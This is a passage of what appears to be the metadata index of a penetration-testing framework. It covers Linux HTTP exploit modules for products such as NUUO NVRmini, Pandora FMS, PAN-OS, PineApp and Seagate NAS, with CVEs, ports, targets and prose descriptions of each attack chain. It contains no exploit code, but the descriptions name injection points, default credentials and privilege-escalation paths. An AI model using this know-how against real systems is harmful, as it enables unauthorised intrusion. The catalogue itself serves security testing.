"ref_name": "linux/http/nuuo_nvrmini_auth_rce",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/nuuo_nvrmini_unauth_rce": {
"name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/nuuo_nvrmini_unauth_rce",
"rank": 600,
"disclosure_date": "2016-08-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NVRmini 2 Network Video Recorder and the ReadyNAS Surveillance application are vulnerable\n to an unauthenticated remote code execution on the exposed web administration interface.\n This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n on those devices.",
"references": [
"CVE-2016-5674",
"US-CERT-VU-856152",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt",
"URL-https://seclists.org/bugtraq/2016/Aug/45"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"NUUO NVRmini 2",
"ReadyNAS NETGEAR Surveillance"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/nuuo_nvrmini_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/nuuo_nvrmini_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/op5_config_exec": {
"name": "op5 v7.1.9 Configuration Command Execution",
"full_name": "exploit/linux/http/op5_config_exec",
"rank": 600,
"disclosure_date": "2016-04-08",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"hyp3rlinx"
],
"description": "op5 is an open source network monitoring software.\n The configuration page in version 7.1.9 and below\n allows the ability to test a system command, which\n can be abused to run arbitrary code as an unprivileged user.",
"references": [
"EDB-39676",
"URL-https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/op5_config_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/op5_config_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/openfiler_networkcard_exec": {
"name": "Openfiler v2.x NetworkCard Command Execution",
"full_name": "exploit/linux/http/openfiler_networkcard_exec",
"rank": 600,
"disclosure_date": "2012-09-04",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in Openfiler v2.x\n which could be abused to allow authenticated users to execute arbitrary\n code under the context of the 'openfiler' user. The 'system.html' file\n uses user controlled data from the 'device' parameter to create a new\n 'NetworkCard' object. The class constructor in 'network.inc' calls exec()\n with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without\n providing a system password.",
"references": [
"BID-55490",
"URL-http://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/",
"OSVDB-93881",
"EDB-21191"
],
"platform": "Unix",
"arch": "cmd",
"rport": 446,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/openfiler_networkcard_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/openfiler_networkcard_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/pandora_fms_exec": {
"name": "Pandora FMS Remote Code Execution",
"full_name": "exploit/linux/http/pandora_fms_exec",
"rank": 600,
"disclosure_date": "2014-01-29",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.\n It will leverage an unauthenticated command injection in the Anyterm service on\n port 8023/TCP. Commands are executed as the user \"pandora\". In Pandora FMS 4.1 and 5.0RC1\n the user \"artica\" is not assigned a password by default, which makes it possible to su\n to this user from the \"pandora\" user. The \"artica\" user has access to sudo without a\n password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0\n and lower force a password for the \"artica\" user during installation.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 8023,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Pandora 5.0RC1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/pandora_fms_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pandora_fms_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pandora_fms_sqli": {
"name": "Pandora FMS Default Credential / SQLi Remote Code Execution",
"full_name": "exploit/linux/http/pandora_fms_sqli",
"rank": 600,
"disclosure_date": "2014-02-01",
"type": "exploit",
"author": [
"Lincoln <Lincoln@corelan.be>",
"Jason Kratzer <pyoor@corelan.be>"
],
"description": "This module attempts to exploit multiple issues in order to gain remote\n code execution under Pandora FMS version <= 5.0 SP2. First, an attempt\n to authenticate using default credentials is performed. If this method\n fails, a SQL injection vulnerability is leveraged in order to extract\n the \"Auto Login\" password hash. If this value is not set, the module\n will then extract the administrator account's MD5 password hash.",
"references": [
"URL-http://pandorafms.com/downloads/whats_new_5-SP3.pdf",
"URL-http://blog.pandorafms.org/?p=2041"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Pandora FMS version <= 5.0 SP2"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/pandora_fms_sqli.rb",
"is_install_path": true,
"ref_name": "linux/http/pandora_fms_sqli",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/panos_readsessionvars": {
"name": "Palo Alto Networks readSessionVarsFromFile() Session Corruption",
"full_name": "exploit/linux/http/panos_readsessionvars",
"rank": 600,
"disclosure_date": "2017-12-11",
"type": "exploit",
"author": [
"Philip Pettersson <philip.pettersson@gmail com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a chain of vulnerabilities in Palo Alto Networks products running\n PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using\n an authentication bypass flaw to exploit an XML injection issue, which is then\n abused to create an arbitrary directory, and finally gains root code execution by\n exploiting a vulnerable cron script. This module uses an initial reverse TLS callback\n to stage arbitrary payloads on the target appliance. The cron job used for the final\n payload runs every 15 minutes by default and exploitation can take up to 20 minutes.",
"references": [
"CVE-2017-15944",
"URL-https://seclists.org/fulldisclosure/2017/Dec/38",
"BID-102079"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-23 19:38:14 +0000",
"path": "/modules/exploits/linux/http/panos_readsessionvars.rb",
"is_install_path": true,
"ref_name": "linux/http/panos_readsessionvars",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/peercast_url": {
"name": "PeerCast URL Handling Buffer Overflow",
"full_name": "exploit/linux/http/peercast_url",
"rank": 200,
"disclosure_date": "2006-03-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.",
"references": [
"CVE-2006-1148",
"OSVDB-23777",
"BID-17040"
],
"platform": "Linux",
"arch": "x86",
"rport": 7144,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PeerCast v0.1212 Binary"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/peercast_url.rb",
"is_install_path": true,
"ref_name": "linux/http/peercast_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/php_imap_open_rce": {
"name": "php imap_open Remote Code Execution",
"full_name": "exploit/linux/http/php_imap_open_rce",
"rank": 400,
"disclosure_date": "2018-10-23",
"type": "exploit",
"author": [
"Anton Lopanitsyn",
"Twoster",
"h00die",
"Paolo Serracino",
"Pietro Minniti",
"Damiano Proietti"
],
"description": "The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an\n IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. SSH's ProxyCommand\n option can be passed from imap_open to execute arbitrary commands.\n While many custom applications may use imap_open, this exploit works against the following applications:\n e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.\n Prestashop exploitation requires the admin URI, and administrator credentials.\n suiteCRM/e107 require administrator credentials. Fixed in php 5.6.39.",
"references": [
"URL-https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395",
"URL-https://github.com/Bo0oM/PHP_imap_open_exploit",
"EDB-45865",
"EDB-46136",
"URL-https://bugs.php.net/bug.php?id=76428",
"CVE-2018-19518",
"CVE-2018-1000859"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"prestashop",
"suitecrm",
"e107v2",
"Horde IMP H3",
"custom"
],
"mod_time": "2019-01-18 19:43:45 +0000",
"path": "/modules/exploits/linux/http/php_imap_open_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/php_imap_open_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapp_ldapsyncnow_exec": {
"name": "PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",
"full_name": "exploit/linux/http/pineapp_ldapsyncnow_exec",
"rank": 600,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"Dave Weinstein",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on PineApp Mail-SeCure\n 3.70. The vulnerability exists on the ldapsyncnow.php component, due to the insecure\n usage of the shell_exec() php function. This module has been tested successfully\n on PineApp Mail-SeCure 3.70.",
"references": [
"ZDI-13-185",
"OSVDB-95781"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PineApp Mail-SeCure 3.70"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapp_ldapsyncnow_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapp_livelog_exec": {
"name": "PineApp Mail-SeCure livelog.html Arbitrary Command Execution",
"full_name": "exploit/linux/http/pineapp_livelog_exec",
"rank": 600,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on PineApp Mail-SeCure\n 3.70. The vulnerability exists on the livelog.html component, due to the insecure\n usage of the shell_exec() php function. This module has been tested successfully\n on PineApp Mail-SeCure 3.70.",
"references": [
"ZDI-13-184",
"OSVDB-95779"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PineApp Mail-SeCure 3.70"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/pineapp_livelog_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapp_livelog_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapp_test_li_conn_exec": {
"name": "PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution",
"full_name": "exploit/linux/http/pineapp_test_li_conn_exec",
"rank": 600,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"Dave Weinstein",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on PineApp Mail-SeCure\n 3.70. The vulnerability exists on the test_li_connection.php component, due to the\n insecure usage of the system() php function. This module has been tested successfully\n on PineApp Mail-SeCure 3.70.",
"references": [
"CVE-2013-6829",
"ZDI-13-188",
"OSVDB-95782"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PineApp Mail-SeCure 3.70"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapp_test_li_conn_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapple_bypass_cmdinject": {
"name": "Hak5 WiFi Pineapple Preconfiguration Command Injection",
"full_name": "exploit/linux/http/pineapple_bypass_cmdinject",
"rank": 600,
"disclosure_date": "2015-08-01",
"type": "exploit",
"author": [
"catatonicprime"
],
"description": "This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.\n These devices may typically be identified by their SSID beacons of 'Pineapple5_....';\n Provided as part of the TospoVirus workshop at DEFCON23.",
"references": [
"CVE-2015-4624"
],
"platform": "Unix",
"arch": "cmd",
"rport": 1471,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WiFi Pineapple 2.0.0 - 2.3.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapple_bypass_cmdinject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapple_preconfig_cmdinject": {
"name": "Hak5 WiFi Pineapple Preconfiguration Command Injection",
"full_name": "exploit/linux/http/pineapple_preconfig_cmdinject",
"rank": 600,
"disclosure_date": "2015-08-01",
"type": "exploit",
"author": [
"catatonicprime"
],
"description": "This module exploits a command injection vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.\n We use a combination of default credentials with a weakness in the anti-csrf generation to achieve\n command injection on fresh pineapple devices prior to configuration. Additionally if default credentials fail,\n you can enable a brute force solver for the proof-of-ownership challenge. This will reset the password to a\n known password if successful and may interrupt the user experience. These devices may typically be identified\n by their SSID beacons of 'Pineapple5_....'; details derived from the TospoVirus, a WiFi Pineapple infecting\n worm.",
"references": [
"CVE-2015-4624"
],
"platform": "Unix",
"arch": "cmd",
"rport": 1471,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WiFi Pineapple 2.0.0 - 2.3.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapple_preconfig_cmdinject",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/piranha_passwd_exec": {
"name": "RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution",
"full_name": "exploit/linux/http/piranha_passwd_exec",
"rank": 600,
"disclosure_date": "2000-04-04",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses two flaws - a metacharacter injection vulnerability in the\n HTTP management server of RedHat 6.2 systems running the Piranha\n LVS cluster service and GUI (rpm packages: piranha and piranha-gui).\n The vulnerability allows an authenticated attacker to execute arbitrary\n commands as the Apache user account (nobody) within the\n /piranha/secure/passwd.php3 script. The package installs with a default\n user and password of piranha:q which was exploited in the wild.",
"references": [
"CVE-2000-0248",
"OSVDB-289",
"BID-1148",
"CVE-2000-0322",
"OSVDB-1300",
"BID-1149"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (piranha-gui-0.4.12-1.i386.rpm)"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/linux/http/piranha_passwd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/piranha_passwd_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/qnap_qcenter_change_passwd_exec": {
"name": "QNAP Q'Center change_passwd Command Execution",
"full_name": "exploit/linux/http/qnap_qcenter_change_passwd_exec",
"rank": 600,
"disclosure_date": "2018-07-11",
"type": "exploit",
"author": [
"Ivan Huertas",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in the\n `change_passwd` API method within the web interface of QNAP Q'Center\n virtual appliance versions prior to 1.7.1083.\n\n The vulnerability allows the 'admin' privileged user account to\n execute arbitrary commands as the 'admin' operating system user.\n\n Valid credentials for the 'admin' user account are required, however,\n this module also exploits a separate password disclosure issue which\n allows any authenticated user to view the password set for the 'admin'\n user during first install.\n\n This module has been tested successfully on QNAP Q'Center appliance\n version 1.6.1075.",
"references": [
"CVE-2018-0706",
"CVE-2018-0707",
"EDB-45015",
"URL-https://www.coresecurity.com/advisories/qnap-qcenter-virtual-appliance-multiple-vulnerabilities",
"URL-https://seclists.org/fulldisclosure/2018/Jul/45",
"URL-https://www.securityfocus.com/archive/1/542141",
"URL-https://www.qnap.com/en-us/security-advisory/nas-201807-10"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/qnap_qcenter_change_passwd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/qnap_qcenter_change_passwd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/raidsonic_nas_ib5220_exec_noauth": {
"name": "Raidsonic NAS Devices Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/raidsonic_nas_ib5220_exec_noauth",
"rank": 0,
"disclosure_date": "2013-02-04",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Different Raidsonic NAS devices are vulnerable to OS command injection via the web\n interface. The vulnerability exists in timeHandler.cgi, which is accessible without\n authentication. This module has been tested with the versions IB-NAS5220 and\n IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon\n configuration, this module is set to ManualRanking and could cause target instability.",
"references": [
"OSVDB-90221",
"EDB-24499",
"BID-57958",
"URL-http://www.s3cur1ty.de/m1adv2013-010"
],
"platform": "Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/raidsonic_nas_ib5220_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/railo_cfml_rfi": {
"name": "Railo Remote File Include",
"full_name": "exploit/linux/http/railo_cfml_rfi",
"rank": 600,
"disclosure_date": "2014-08-26",
"type": "exploit",
"author": [
"Bryan Alexander <drone@ballastsecurity.net>",
"bperry"
],
"description": "This module exploits a remote file include vulnerability in Railo,\n tested against version 4.2.1. First, a call using a vulnerable\n <cffile> line in thumbnail.cfm allows an attacker to download an\n arbitrary PNG file. By appending a .cfm, and taking advantage of\n a directory traversal, an attacker can append cold fusion markup\n to the PNG file, and have it interpreted by the server. This is\n used to stage and execute a fully-fledged payload.",
"references": [
"CVE-2014-5468",
"URL-http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/"
],
"platform": "Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/railo_cfml_rfi.rb",
"is_install_path": true,
"ref_name": "linux/http/railo_cfml_rfi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/rancher_server": {
"name": "Rancher Server - Docker Exploit",
"full_name": "exploit/linux/http/rancher_server",
"rank": 600,
"disclosure_date": "2017-07-27",
"type": "exploit",
"author": [
"Martin Pizala"
],
"description": "Utilizing Rancher Server, an attacker can create a docker container\n with the '/' path mounted with read/write permissions on the host\n server that is running the docker container. As the docker container\n executes commands as uid 0, they are honored by the host operating system,\n allowing the attacker to edit/create files owned by root. This exploit\n abuses this to create a cron job in the '/etc/cron.d/' path of the\n host server.\n\n The Docker image should exist on the target system or be a valid image\n from hub.docker.com.\n\n Use `check` with verbose mode to get a list of exploitable Rancher\n Hosts managed by the target system.",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2017-10-07 01:10:23 +0000",
"path": "/modules/exploits/linux/http/rancher_server.rb",
"is_install_path": true,
"ref_name": "linux/http/rancher_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/realtek_miniigd_upnp_exec_noauth": {
"name": "Realtek SDK Miniigd UPnP SOAP Command Execution",
"full_name": "exploit/linux/http/realtek_miniigd_upnp_exec_noauth",
"rank": 300,
"disclosure_date": "2015-04-24",
"type": "exploit",
"author": [
"Ricky \"HeadlessZeke\" Lawshae",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\n there is no output for the executed command. This module has been tested successfully on a\n Trendnet TEW-731BR router with emulation.",
"references": [
"CVE-2014-8361",
"ZDI-15-155",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055"
],
"platform": "",
"arch": "",
"rport": 52869,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/realtek_miniigd_upnp_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/riverbed_netprofiler_netexpress_exec": {
"name": "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
"full_name": "exploit/linux/http/riverbed_netprofiler_netexpress_exec",
"rank": 600,
"disclosure_date": "2016-06-27",
"type": "exploit",
"author": [
"Francesco Oddo <francesco.oddo@security-assessment.com>"
],
"description": "This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress\n virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form\n can be exploited to add a malicious user into the application's database. An attacker can then exploit a\n command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure\n configuration of the sudoers file can be abused to escalate privileges to root.",
"references": [
"URL-http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf"
],
"platform": "Linux",
"arch": "x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/riverbed_netprofiler_netexpress_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/samsung_srv_1670d_upload_exec": {
"name": "Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload",
"full_name": "exploit/linux/http/samsung_srv_1670d_upload_exec",
"rank": 400,
"disclosure_date": "2017-03-14",
"type": "exploit",
"author": [
"Omar Mezrag <omar.mezrag@realistic-security.com>",
"Realistic Security",
"Algeria"
],
"description": "This module exploits an unrestricted file upload vulnerability in\n Web Viewer 1.0.0.193 on Samsung SRN-1670D devices. The network_ssl_upload.php file\n allows remote authenticated attackers to upload and execute arbitrary\n PHP code via a filename with a .php extension, which is then accessed via a\n direct request to the file in the upload/ directory.\n\n To authenticate for this attack, one can obtain web-interface credentials\n in cleartext by leveraging the existing local file read vulnerability\n referenced by CVE-2015-8279, which allows remote attackers to read the\n web interface credentials by sending a request to:\n cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.",
"references": [
"CVE-2017-16524",
"URL-https://github.com/realistic-security/CVE-2017-16524",
"CVE-2015-8279",
"URL-http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Samsung SRN-1670D 1.0.0.193"
],
"mod_time": "2018-01-10 20:13:42 +0000",
"path": "/modules/exploits/linux/http/samsung_srv_1670d_upload_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/samsung_srv_1670d_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/seagate_nas_php_exec_noauth": {
"name": "Seagate Business NAS Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/seagate_nas_php_exec_noauth",
"rank": 300,
"disclosure_date": "2015-03-01",
"type": "exploit",
"author": [
"OJ Reeves <oj@beyondbinary.io>"
],
"description": "Some Seagate Business NAS devices are vulnerable to command execution via a local\n file include vulnerability hidden in the language parameter of the CodeIgniter\n session cookie. The vulnerability manifests in the way the language files are\n included in the code on the login page, and hence is open to attack from users\n without the need for authentication. The cookie can be easily decrypted using a\n known static encryption key and re-encrypted once the PHP object string has been\n modified.\n\n This module has been tested on the STBN300 device.",
"references": [
"CVE-2014-8684",
"CVE-2014-8686",
"CVE-2014-8687",
"EDB-36202",
"URL-http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/",
"URL-https://beyondbinary.io/advisory/seagate-nas-rce/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/seagate_nas_php_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/smt_ipmi_close_window_bof": {
"name": "Supermicro Onboard IPMI close_window.cgi Buffer Overflow",
"full_name": "exploit/linux/http/smt_ipmi_close_window_bof",
"rank": 400,
"disclosure_date": "2013-11-06",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow on the Supermicro Onboard IPMI controller web\n interface. The vulnerability exists on the close_window.cgi CGI application, and is due\n to the insecure usage of strcpy. In order to get a session, the module will execute\n system() from libc with an arbitrary CMD payload sent on the User-Agent header. This\n module has been tested successfully on Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n SMT_X9_214.",
"references": [
"CVE-2013-3623",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/smt_ipmi_close_window_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/sophos_wpa_iface_exec": {
"name": "Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",
"full_name": "exploit/linux/http/sophos_wpa_iface_exec",
"rank": 600,
"disclosure_date": "2014-04-08",
"type": "exploit",
"author": [
